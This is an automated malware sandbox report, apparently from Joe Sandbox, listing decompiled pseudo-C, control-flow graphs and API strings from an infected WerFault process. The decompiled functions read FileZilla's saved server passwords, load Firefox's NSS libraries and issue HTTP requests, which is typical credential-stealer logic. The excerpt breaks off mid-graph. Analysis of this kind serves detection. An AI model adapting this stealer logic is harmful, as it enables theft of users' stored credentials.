                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: fc381945dc204cddcdb2922191d9ee64660affaca0beca05053826328c03b72a
                        • Instruction ID: 6a042a6c5fa4d2cf0e359c97434d27308b6336a818ebf3d57fd68d7842d84007
                        • Opcode Fuzzy Hash: fc381945dc204cddcdb2922191d9ee64660affaca0beca05053826328c03b72a
                        • Instruction Fuzzy Hash: D8E0B63D804109EACF667B94C9097EEBBB1AF2535EF288151A125F04E0837506E9DF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02880EDD Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02880EDD() {
				void* _t12;

				if( *((intOrPtr*)(_t12 - 0x18)) != 0) {
					L02887AE2( *((intOrPtr*)(_t12 + 8)),  *((intOrPtr*)(_t12 - 0x18)));
				}
				if( *((intOrPtr*)(_t12 - 0xc)) != 0) {
					L02887AE2(0xffffffff,  *((intOrPtr*)(_t12 - 0xc)));
				}
				if( *(_t12 - 0x14) != 0) {
					NtClose( *(_t12 - 0x14)); // executed
				}
				return 0;
			}




                        0x02880f0b
                        0x02880f13
                        0x02880f13
                        0x02880f1c
                        0x02880f23
                        0x02880f23
                        0x02880f2c
                        0x02880f31
                        0x02880f31
                        0x02880f3a

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: de78f154e5506a4038ecdc154ace678739b201a5cad2f1fbdb887c88a9c41275
                        • Instruction ID: 6a042a6c5fa4d2cf0e359c97434d27308b6336a818ebf3d57fd68d7842d84007
                        • Opcode Fuzzy Hash: de78f154e5506a4038ecdc154ace678739b201a5cad2f1fbdb887c88a9c41275
                        • Instruction Fuzzy Hash: D8E0B63D804109EACF667B94C9097EEBBB1AF2535EF288151A125F04E0837506E9DF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02880E43 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02880E43() {
				void* _t12;

				if( *((intOrPtr*)(_t12 - 0x18)) != 0) {
					L02887AE2( *((intOrPtr*)(_t12 + 8)),  *((intOrPtr*)(_t12 - 0x18)));
				}
				if( *((intOrPtr*)(_t12 - 0xc)) != 0) {
					L02887AE2(0xffffffff,  *((intOrPtr*)(_t12 - 0xc)));
				}
				if( *(_t12 - 0x14) != 0) {
					NtClose( *(_t12 - 0x14)); // executed
				}
				return 0;
			}




                        0x02880f0b
                        0x02880f13
                        0x02880f13
                        0x02880f1c
                        0x02880f23
                        0x02880f23
                        0x02880f2c
                        0x02880f31
                        0x02880f31
                        0x02880f3a

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 8bd9ab685aae6bf8dca6e55118055723555fb02e9f011c7205344c7a825ab8f5
                        • Instruction ID: 6a042a6c5fa4d2cf0e359c97434d27308b6336a818ebf3d57fd68d7842d84007
                        • Opcode Fuzzy Hash: 8bd9ab685aae6bf8dca6e55118055723555fb02e9f011c7205344c7a825ab8f5
                        • Instruction Fuzzy Hash: D8E0B63D804109EACF667B94C9097EEBBB1AF2535EF288151A125F04E0837506E9DF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0287918E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 232fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 107 287918e-287919f 108 2879487 107->108 109 28791a5-28791a8 107->109 110 2879489-287948d 108->110 109->108 111 28791ae-28791d8 call 286161b 109->111 111->108 114 28791de-287920b call 28614db * 2 call 28619e8 111->114 121 2879211-2879253 CreateFileW 114->121 122 287943f-287944b 114->122 132 2879469-287946f call 28617e4 121->132 133 2879259-2879266 121->133 125 2879455-287945a 122->125 126 287944d-2879450 call 28617e4 122->126 128 2879461-2879464 125->128 129 287945c call 2861caf 125->129 126->125 134 2879466 128->134 135 2879472-2879485 128->135 129->128 132->135 133->122 139 287926c-287927a call 286161b 133->139 134->132 135->110 139->122 142 2879280-2879294 139->142 142->122 144 287929a-28792ba call 2861869 call 2861b93 142->144 144->122 149 28792c0-28792c3 144->149 149->122 150 28792c9-28792d1 149->150 150->122 151 28792d7 150->151 152 28792dd-28792ec call 28614db 151->152 155 28792ee-2879300 call 2861ee5 152->155 156 287930a-287930e 152->156 158 2879426-2879430 155->158 163 2879306 155->163 156->158 159 2879314-2879328 call 2861ee5 156->159 158->152 161 2879436-2879439 158->161 166 287932a-2879333 159->166 167 2879338-2879342 call 28619d6 159->167 161->122 164 287943b 161->164 163->156 164->122 166->158 167->158 170 2879348-2879356 call 2861ee5 167->170 173 287936a-2879378 call 2861ee5 170->173 174 2879358-2879368 call 2862082 170->174 180 28793b5-28793c3 call 2861ee5 173->180 181 287937a-287939c call 2862082 call 286171c 173->181 179 28793d5-28793dd 174->179 179->158 187 28793c5-28793cf call 2862082 180->187 188 28793df-28793ed call 2861ee5 180->188 181->158 197 28793a2-28793b3 call 28617e4 181->197 187->179 188->158 196 28793ef-287941f call 2862082 188->196 196->158 197->158
                        C-Code - Quality: 60%
                        			E0287918E(void* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v5;
				char _v6;
				struct _SECURITY_ATTRIBUTES* _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				char _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _SECURITY_ATTRIBUTES* _v32;
				signed int _v36;
				char _v40;
				char _v56;
				short _v576;
				void* _t92;
				intOrPtr _t95;
				intOrPtr _t100;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t116;
				short _t123;
				void* _t141;
				void* _t142;
				void* _t143;
				struct _SECURITY_ATTRIBUTES* _t144;
				short* _t145;
				void* _t147;
				signed int _t148;
				intOrPtr _t150;
				void* _t151;

				if(_a4 == 0 || _a8 == 0) {
					L40:
					return 0;
				} else {
					_v28 = 0;
					_v40 = 0;
					_v24 = 0;
					_v20 = 0;
					_v12 = 0;
					_v16 = 0;
					_v6 = 0;
					_v5 = 0;
					_t144 = E0286161B(0x4200);
					_v32 = _t144;
					if(_t144 == 0) {
						goto L40;
					}
					E028614DB(__ecx, _t144, 0, 0x4200);
					E028614DB(__ecx,  &_v576, 0, 0x208);
					_t131 =  *0x289f2e8 + 0x37e;
					if(E028619E8( *0x289f2e8 + 0x37e) == 0) {
						L32:
						 *0x289f824(_v28);
						if(_v12 != 0) {
							E028617E4(_v12);
						}
						_t80 = _v20;
						if(_v20 != 0) {
							E02861CAF(_t80);
						}
						if(_v16 != 0) {
							L39:
							 *_a4 = _v32;
							 *_a8 = _v16;
							return _v6;
						} else {
							_t144 = _v32;
							L38:
							E028617E4(_t144);
							_v32 = 0;
							goto L39;
						}
					}
					 *0x289fc68( &_v576);
					 *0x289f6b4( &_v576, L"FileZilla\\sitemanager.xml");
					_t92 = CreateFileW( &_v576, 0x80000000, 1, 0, 4, 0x80, 0); // executed
					_v28 = _t92;
					if(_t92 == 0xffffffff) {
						goto L38;
					}
					_t147 =  *0x289f778(_t92, 0);
					if(_t147 < 0xc) {
						goto L32;
					}
					_t17 = _t147 + 2; // 0x2
					_t95 = E0286161B(_t17);
					_v12 = _t95;
					if(_t95 == 0) {
						goto L32;
					}
					_push(0);
					_push( &_v40);
					_push(_t147);
					_push(_v12);
					_push(_v28);
					if( *0x289f78c() == 0) {
						goto L32;
					}
					E02861869(_t97, _v12, 0xd, 0xa);
					_t100 = E02861B93(_t131, _v12, 0x2895388,  &_v24);
					_v20 = _t100;
					if(_t100 != 0 && _v24 != 0) {
						_t148 = 0;
						_v36 = 0;
						if(_v24 > 0) {
							_t145 = _t144 + 0x20c;
							do {
								E028614DB(_t131,  &_v56, 0, 0x10);
								if(_v5 != 0) {
									L15:
									if(_v5 != 1) {
										goto L29;
									}
									_t150 =  *((intOrPtr*)(_v20 + _t148 * 4));
									if(E02861EE5(_t150, "<Server>") < 0) {
										_t131 = _t150;
										if(E028619D6(_t150) <= 8) {
											goto L29;
										}
										_t106 = E02861EE5(_t150, "<Host>");
										if(_t106 < 0) {
											_t107 = E02861EE5(_t150, "<Port>");
											if(_t107 < 0) {
												_t108 = E02861EE5(_t150, "<User>");
												if(_t108 < 0) {
													_t109 = E02861EE5(_t150, "<Pass>");
													if(_t109 >= 0) {
														_t51 = _t109 + 6; // 0x6
														_t141 = _t150 + _t51;
														_t52 = _t145 - 0x184; // -912
														 *0x289f6a0(_t52, _t141, E02862082(_t141));
														 *((short*)(_t145 - 0x20c)) = 0x210;
														 *((intOrPtr*)(_t145 - 0x208)) = 3;
														 *((short*)(_t145 - 0x20a)) = 0;
													}
													goto L29;
												}
												_t48 = _t108 + 6; // 0x6
												_t142 = _t150 + _t48;
												_push(E02862082(_t142));
												_t49 = _t145 - 0x204; // -1040
												_t116 = _t49;
												L26:
												 *0x289f6a0(_t116, _t142);
												goto L29;
											}
											_t44 = _t107 + 6; // 0x6
											_t143 = _t150 + _t44;
											 *0x289f6a0( &_v56, _t143, E02862082(_t143));
											_t151 = E0286171C( &_v56);
											if(_t151 != 0) {
												_t123 =  *0x289f64c();
												_t131 = _t151;
												 *_t145 = _t123;
												E028617E4(_t151);
											}
											goto L29;
										}
										_t41 = _t106 + 6; // 0x6
										_t142 = _t150 + _t41;
										_push(E02862082(_t142));
										_t42 = _t145 - 0x104; // -784
										_t116 = _t42;
										goto L26;
									}
									_v16 = _v16 + 1;
									_t145 = _t145 + 0x210;
									goto L29;
								}
								if(E02861EE5( *((intOrPtr*)(_v20 + _t148 * 4)), "FileZi") != 0) {
									_v5 = 1;
									goto L15;
								}
								L29:
								_t148 = _v36 + 1;
								_v36 = _t148;
							} while (_t148 < _v24);
							if(_v16 != 0) {
								_v6 = 1;
							}
						}
					}
					goto L32;
				}
			}

































                        0x0287919f
                        0x02879487
                        0x00000000
                        0x028791ae
                        0x028791b4
                        0x028791b7
                        0x028791ba
                        0x028791bd
                        0x028791c0
                        0x028791c3
                        0x028791c6
                        0x028791c9
                        0x028791d1
                        0x028791d3
                        0x028791d8
                        0x00000000
                        0x00000000
                        0x028791e1
                        0x028791f3
                        0x028791fe
                        0x0287920b
                        0x0287943f
                        0x02879442
                        0x0287944b
                        0x02879450
                        0x02879450
                        0x02879455
                        0x0287945a
                        0x0287945c
                        0x0287945c
                        0x02879464
                        0x02879472
                        0x02879478
                        0x02879480
                        0x00000000
                        0x02879466
                        0x02879466
                        0x02879469
                        0x0287946a
                        0x0287946f
                        0x00000000
                        0x0287946f
                        0x02879464
                        0x02879218
                        0x0287922a
                        0x02879247
                        0x0287924d
                        0x02879253
                        0x00000000
                        0x00000000
                        0x02879261
                        0x02879266
                        0x00000000
                        0x00000000
                        0x0287926c
                        0x02879270
                        0x02879275
                        0x0287927a
                        0x00000000
                        0x00000000
                        0x02879280
                        0x02879284
                        0x02879285
                        0x02879286
                        0x02879289
                        0x02879294
                        0x00000000
                        0x00000000
                        0x028792a1
                        0x028792b0
                        0x028792b5
                        0x028792ba
                        0x028792c9
                        0x028792cb
                        0x028792d1
                        0x028792d7
                        0x028792dd
                        0x028792e4
                        0x028792ec
                        0x0287930a
                        0x0287930e
                        0x00000000
                        0x00000000
                        0x02879317
                        0x02879328
                        0x02879338
                        0x02879342
                        0x00000000
                        0x00000000
                        0x0287934f
                        0x02879356
                        0x02879371
                        0x02879378
                        0x028793bc
                        0x028793c3
                        0x028793e6
                        0x028793ed
                        0x028793ef
                        0x028793ef
                        0x028793fa
                        0x02879401
                        0x0287940c
                        0x02879415
                        0x0287941f
                        0x0287941f
                        0x00000000
                        0x028793ed
                        0x028793c5
                        0x028793c5
                        0x028793ce
                        0x028793cf
                        0x028793cf
                        0x028793d5
                        0x028793d7
                        0x00000000
                        0x028793d7
                        0x0287937a
                        0x0287937a
                        0x02879389
                        0x02879398
                        0x0287939c
                        0x028793a3
                        0x028793a9
                        0x028793ab
                        0x028793ae
                        0x028793ae
                        0x00000000
                        0x0287939c
                        0x02879358
                        0x02879358
                        0x02879361
                        0x02879362
                        0x02879362
                        0x00000000
                        0x02879362
                        0x0287932a
                        0x0287932d
                        0x00000000
                        0x0287932d
                        0x02879300
                        0x02879306
                        0x00000000
                        0x02879306
                        0x02879426
                        0x02879429
                        0x0287942a
                        0x0287942d
                        0x02879439
                        0x0287943b
                        0x0287943b
                        0x02879439
                        0x028792d1
                        0x00000000
                        0x028792ba

                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000), ref: 02879247
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: <Host>$<Pass>$<Port>$<Server>$<User>$FileZi$FileZilla\sitemanager.xml
                        • API String ID: 823142352-2360068268
                        • Opcode ID: 3dcbcc123276fe934b913157439d5d5a0bb75c20991626c6dcbbb57e370cdbca
                        • Instruction ID: c9488f11d503500592a2af89563b9910862ea42a7f9d54508354243cc36b16f8
                        • Opcode Fuzzy Hash: 3dcbcc123276fe934b913157439d5d5a0bb75c20991626c6dcbbb57e370cdbca
                        • Instruction Fuzzy Hash: 9A81A47DD00219ABDF11EFE8C888AAEB7B9AF04304F548466E509F7241D774DA45CF62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02889FE6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 204 2889fe6-288a01f Sleep call 2864c5d 208 288a024-288a034 Sleep 204->208 209 288a03a-288a04b call 286d774 208->209 210 288a143-288a14a 208->210 215 288a078-288a0a3 call 288a7af call 288a294 call 288a20e call 286d774 209->215 216 288a04d-288a050 209->216 212 288a14c 210->212 213 288a155-288a159 210->213 212->213 232 288a0ba-288a0cd call 2863287 215->232 233 288a0a5-288a0ac 215->233 216->215 217 288a052-288a066 call 2863287 216->217 217->215 224 288a068-288a073 217->224 229 288a106-288a10e 224->229 229->210 231 288a110-288a117 229->231 231->210 234 288a119-288a12c 231->234 232->229 242 288a0cf-288a0da Sleep 232->242 233->232 235 288a0ae-288a0b5 call 288a15c 233->235 234->210 241 288a12e-288a13d 234->241 235->232 243 288a0b7 235->243 241->208 241->210 244 288a0dc-288a0f1 call 288a45c call 28834cf Sleep 242->244 245 288a0f3 242->245 243->232 247 288a0f7-288a100 Sleep FindCloseChangeNotification 244->247 245->247 247->229
                        C-Code - Quality: 63%
                        			E02889FE6(void* __ecx, void* __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __edi;
				void* __esi;
				void* _t33;
				intOrPtr _t35;
				void* _t41;
				signed int _t42;
				void* _t44;
				void* _t47;
				void* _t49;
				void* _t52;
				void* _t55;

				_t47 = __ecx;
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v5 = 0;
				Sleep(0x9c4); // executed
				E02864C5D(_t47, _v16, 0xffffffff); // executed
				 *0x289f968( *0x289ec4a, 0x4d2, _t49, _t52, _t44);
				while(1) {
					Sleep(0x64); // executed
					if( *0x289fd9c == 0) {
						break;
					}
					if(E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) != 0 || _v12 != 0) {
						L6:
						E0288A7AF( *0x289f2e8 + 0x2376); // executed
						E0288A294(); // executed
						E0288A20E();
						_t33 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
						__eflags = _t33;
						if(_t33 == 0) {
							__eflags = _v16 - 0x80;
							if(_v16 < 0x80) {
								_t41 = E0288A15C(_t47);
								__eflags = _t41 - 1;
								if(_t41 == 1) {
									_t11 =  &_v16;
									 *_t11 = _v16 + 1;
									__eflags =  *_t11;
								}
							}
						}
						_t55 = E02863287("PRB", 0, 0x47, 1);
						__eflags = _t55;
						if(_t55 != 0) {
							Sleep(0x96); // executed
							__eflags = _v5 - 1;
							if(_v5 != 1) {
								_v5 = 1;
							} else {
								E0288A45C(); // executed
								E028834CF(0x96, _t55); // executed
								Sleep(0x96); // executed
								_v5 = 0;
							}
							Sleep(0x14); // executed
							FindCloseChangeNotification(_t55); // executed
						}
						goto L15;
					} else {
						_t42 = E02863287("EP91", 0, 0x43, 1);
						_v12 = _t42;
						if(_t42 != 0) {
							goto L6;
						} else {
							 *0x289f90c(0x3e8);
							L15:
							_t35 =  *0x289fdb0;
							if(_t35 != 0 &&  *0x289fd9c != 0) {
								_push(0xc8);
								_push(_t35);
								if( *0x289f8a4() != 0x102) {
									break;
								}
								_push(0x9c4);
								_push( *0x289fd9c);
								if( *0x289f8a4() == 0x102) {
									continue;
								}
							}
							break;
						}
					}
				}
				if(_v12 != 0) {
					 *0x289f824(_v12);
				}
				return 1;
			}

















                        0x02889fe6
                        0x02889fec
                        0x02889ff0
                        0x02889ffd
                        0x0288a001
                        0x0288a009
                        0x0288a019
                        0x0288a024
                        0x0288a026
                        0x0288a034
                        0x00000000
                        0x00000000
                        0x0288a04b
                        0x0288a078
                        0x0288a083
                        0x0288a088
                        0x0288a08d
                        0x0288a09c
                        0x0288a0a1
                        0x0288a0a3
                        0x0288a0a5
                        0x0288a0ac
                        0x0288a0ae
                        0x0288a0b3
                        0x0288a0b5
                        0x0288a0b7
                        0x0288a0b7
                        0x0288a0b7
                        0x0288a0b7
                        0x0288a0b5
                        0x0288a0ac
                        0x0288a0c9
                        0x0288a0cb
                        0x0288a0cd
                        0x0288a0d0
                        0x0288a0d6
                        0x0288a0da
                        0x0288a0f3
                        0x0288a0dc
                        0x0288a0dc
                        0x0288a0e1
                        0x0288a0e7
                        0x0288a0ed
                        0x0288a0ed
                        0x0288a0f9
                        0x0288a100
                        0x0288a100
                        0x00000000
                        0x0288a052
                        0x0288a05c
                        0x0288a061
                        0x0288a066
                        0x00000000
                        0x0288a068
                        0x0288a06d
                        0x0288a107
                        0x0288a107
                        0x0288a10e
                        0x0288a119
                        0x0288a11e
                        0x0288a12c
                        0x00000000
                        0x00000000
                        0x0288a12e
                        0x0288a12f
                        0x0288a13d
                        0x00000000
                        0x00000000
                        0x0288a13d
                        0x00000000
                        0x0288a10e
                        0x0288a066
                        0x0288a04b
                        0x0288a14a
                        0x0288a14f
                        0x0288a14f
                        0x0288a159

                        APIs
                        • Sleep.KERNEL32(000009C4), ref: 0288A001
                        • Sleep.KERNEL32(00000064), ref: 0288A026
                        • Sleep.KERNEL32(00000096,PRB,00000000,00000047,00000001,?,?,?), ref: 0288A0D0
                        • Sleep.KERNEL32(00000096), ref: 0288A0E7
                        • Sleep.KERNEL32(00000014), ref: 0288A0F9
                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 0288A100
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$ChangeCloseFindNotification
                        • String ID: EP91$PRB
                        • API String ID: 1808342102-3406640311
                        • Opcode ID: b842c6c88c018274f7a3fd1baba42f1d41c7ab4a261eb65a73b4146cda96a2c4
                        • Instruction ID: 9c5e36412a4d7195a504454ba5a661a93c2a07a357052837771623ab2f230709
                        • Opcode Fuzzy Hash: b842c6c88c018274f7a3fd1baba42f1d41c7ab4a261eb65a73b4146cda96a2c4
                        • Instruction Fuzzy Hash: 8631F33CD81204FBEB297BA8D848B6D7BB5AF24B16F188452F606E60C0C7754495CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02866202 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 164COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 703 2866202-2866229 704 2866238-286623f 703->704 705 2866253-2866278 call 2885150 * 2 704->705 706 2866241-2866251 704->706 712 2866283-2866285 705->712 713 286627a-2866281 705->713 706->704 715 28664bc-28664be 712->715 713->712 714 286628a-28662c3 call 2884f0a call 2866194 713->714 720 28662c5-28662c7 714->720 721 28662cc-2866305 call 2884f0a call 2866194 714->721 720->715 726 2866307-2866309 721->726 727 286630e-2866323 SetErrorMode 721->727 726->715 728 2866332-2866339 727->728 729 2866422-2866453 call 28664bf call 2861807 728->729 730 286633f-286636e call 286171c 728->730 751 28664a6-28664ba call 2878f6f call 2878f00 729->751 752 2866455-2866469 729->752 735 2866374-286638d LoadLibraryW 730->735 736 286640a 730->736 739 2866395-28663bf call 2884f0a 735->739 740 286638f-2866393 735->740 738 286640e-2866414 736->738 742 2866416-2866418 738->742 743 286641d 738->743 749 28663c4-28663f7 call 2866194 739->749 744 28663fd-2866408 call 28617e4 740->744 742->715 743->728 744->738 749->744 757 28663f9 749->757 751->715 752->751 760 286646b-2866470 752->760 757->744 762 2866479-286647b 760->762 762->751 763 286647d-286648a 762->763 763->751 765 286648c-2866499 763->765 765->751 767 286649b 765->767 767->751
                        C-Code - Quality: 56%
                        			E02866202(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v13;
				signed int _v20;
				char _v540;
				signed int _v544;
				signed int _v548;
				WCHAR* _v552;
				signed int _v556;
				signed int _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				void* __edi;
				void* _t85;
				struct HINSTANCE__* _t97;
				signed int _t100;

				_v568 = __ecx;
				_v13 = 1;
				_v20 = _v20 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v544 = _v544 & 0x00000000;
				L2:
				if(_v544 < 0xe) {
					 *(0x2899648 + _v544 * 0x28) =  *(0x2899648 + _v544 * 0x28) & 0x00000000;
					_v544 = _v544 + 1;
					goto L2;
				}
				 *0x2899648 = E02885150(0x2899628);
				 *0x2899670 = E02885150(0x2899650);
				if( *0x2899648 == 0 ||  *0x2899670 == 0) {
					return 0;
				}
				_v12 = E02884F0A(0x2899628, 0, 0x2899858, 0x20a);
				_v20 = E02866194(_t67, _v568, 0, 0x2899858, 0x20a);
				if(_v12 >= _v20) {
					_v12 = E02884F0A(0x2899628, 1, 0x2899858, 0x20a);
					_v20 = E02866194(_t70, _v568, 1, 0x2899858, 0x20a);
					if(_v12 >= _v20) {
						SetErrorMode(0x8007); // executed
						_v548 = 2;
						while(_v548 < 0xe) {
							_v560 = _v560 & 0x00000000;
							_v556 = _v556 & 0x00000000;
							_v552 = E0286171C(0x2899628 + _v548 * 0x28);
							if(_v552 == 0) {
								_v13 = 0;
								L21:
								if((_v13 & 0x000000ff) != 0) {
									_v548 = _v548 + 1;
									continue;
								}
								return 0;
							}
							_t97 = LoadLibraryW(_v552); // executed
							_v556 = _t97;
							if(_v556 != 0) {
								 *(0x2899648 + _v548 * 0x28) = _v556;
								_t100 = E02884F0A(0x2899628, _v548, 0x2899858, 0x20a); // executed
								_v560 = _t100;
								_v564 = E02866194(_t100, _v568, _v548, 0x2899858, 0x20a);
								if(_v560 < _v564) {
									_v13 = 0;
								}
							} else {
								_v13 = 0;
							}
							E028617E4(_v552);
							goto L21;
						}
						E028664BF(0x289f530); // executed
						E02861807( &_v540, 0x208);
						_push(0x103);
						_push( &_v540);
						_push(0);
						if( *0x289f8c8() != 0) {
							_v8 =  *0x289fc64( &_v540);
							if(_v8 != 0) {
								_t85 =  *0x289f69c(_v8, L"firefox.exe"); // executed
								if(_t85 == 0) {
									_push("nspr4.dll");
									if( *0x289f8cc() == 0) {
										_push("nspr4.dll");
										if( *0x289f914() == 0) {
											 *0x289f914("nss3.dll");
										}
									}
								}
							}
						}
						E02878F6F();
						E02878F00(0x289f530);
						 *((char*)(_v568 + 1)) = 1;
						return 1;
					}
					return 0;
				} else {
					return 0;
				}
			}



















                        0x0286620c
                        0x02866212
                        0x02866216
                        0x0286621a
                        0x0286621e
                        0x02866222
                        0x02866238
                        0x0286623f
                        0x0286624a
                        0x02866232
                        0x00000000
                        0x02866232
                        0x0286625d
                        0x0286626c
                        0x02866278
                        0x00000000
                        0x02866283
                        0x028662a0
                        0x028662ba
                        0x028662c3
                        0x028662e2
                        0x028662fc
                        0x02866305
                        0x02866313
                        0x02866319
                        0x02866332
                        0x0286633f
                        0x02866346
                        0x02866361
                        0x0286636e
                        0x0286640a
                        0x0286640e
                        0x02866414
                        0x0286632c
                        0x00000000
                        0x0286632c
                        0x00000000
                        0x02866416
                        0x0286637a
                        0x02866380
                        0x0286638d
                        0x028663a4
                        0x028663bf
                        0x028663c4
                        0x028663e5
                        0x028663f7
                        0x028663f9
                        0x028663f9
                        0x0286638f
                        0x0286638f
                        0x0286638f
                        0x02866403
                        0x00000000
                        0x02866403
                        0x02866427
                        0x02866438
                        0x0286643d
                        0x02866448
                        0x02866449
                        0x02866453
                        0x02866462
                        0x02866469
                        0x02866473
                        0x0286647b
                        0x0286647d
                        0x0286648a
                        0x0286648c
                        0x02866499
                        0x028664a0
                        0x028664a0
                        0x02866499
                        0x0286648a
                        0x0286647b
                        0x02866469
                        0x028664a6
                        0x028664ab
                        0x028664b6
                        0x00000000
                        0x028664ba
                        0x00000000
                        0x028662c5
                        0x00000000
                        0x028662c5

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: firefox.exe$kernel32.dll$nspr4.dll$nss3.dll$ntdll.dll
                        • API String ID: 0-373526193
                        • Opcode ID: 9ba848620035767184ef56f84d8acc750a9fa346f6b895351893ea0e4b3e0b2d
                        • Instruction ID: 52b37458b9a50a3a41dead66c2e08f92523b987e22dbc8cd26be2b07214d1da2
                        • Opcode Fuzzy Hash: 9ba848620035767184ef56f84d8acc750a9fa346f6b895351893ea0e4b3e0b2d
                        • Instruction Fuzzy Hash: 87616F7CE413A8AFEF10AFA4DC8DBADB7B5AB14305F0844D9D109E6281E7784A85CF01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0287ABCB Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 246networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1132 287abcb-287abe2 1133 287af1b 1132->1133 1134 287abe8-287abf0 1132->1134 1136 287af1d-287af21 1133->1136 1134->1133 1135 287abf6-287abfc 1134->1135 1135->1133 1137 287ac02-287ac2d 1135->1137 1138 287ac36-287ac80 call 287b4a9 1137->1138 1139 287ac2f 1137->1139 1138->1133 1144 287ac86-287ac8d 1138->1144 1139->1138 1145 287ac95-287acc7 call 28619d6 call 28747e9 1144->1145 1146 287ac8f-287ac90 call 287ab6a 1144->1146 1153 287acce 1145->1153 1154 287acc9-287accc 1145->1154 1146->1145 1155 287acd8-287acee call 287b56d 1153->1155 1154->1155 1158 287acf4-287acfe call 28619d6 1155->1158 1159 287adbe-287adc6 1155->1159 1164 287adb6-287adb9 call 28617e4 1158->1164 1165 287ad04-287ad08 1158->1165 1160 287adcf-287add9 1159->1160 1161 287adc8 1159->1161 1160->1136 1161->1160 1164->1159 1165->1164 1166 287ad0e-287ad2e call 28619d6 HttpSendRequestA 1165->1166 1170 287ad77-287ad7a 1166->1170 1171 287ad30-287ad37 1166->1171 1172 287aee5-287aef0 1170->1172 1173 287ad80-287ad9d 1170->1173 1171->1172 1174 287ad3d-287ad4a call 287ab2c 1171->1174 1180 287aef2-287aef9 1172->1180 1181 287aefe-287af03 1172->1181 1178 287adf0-287adfd 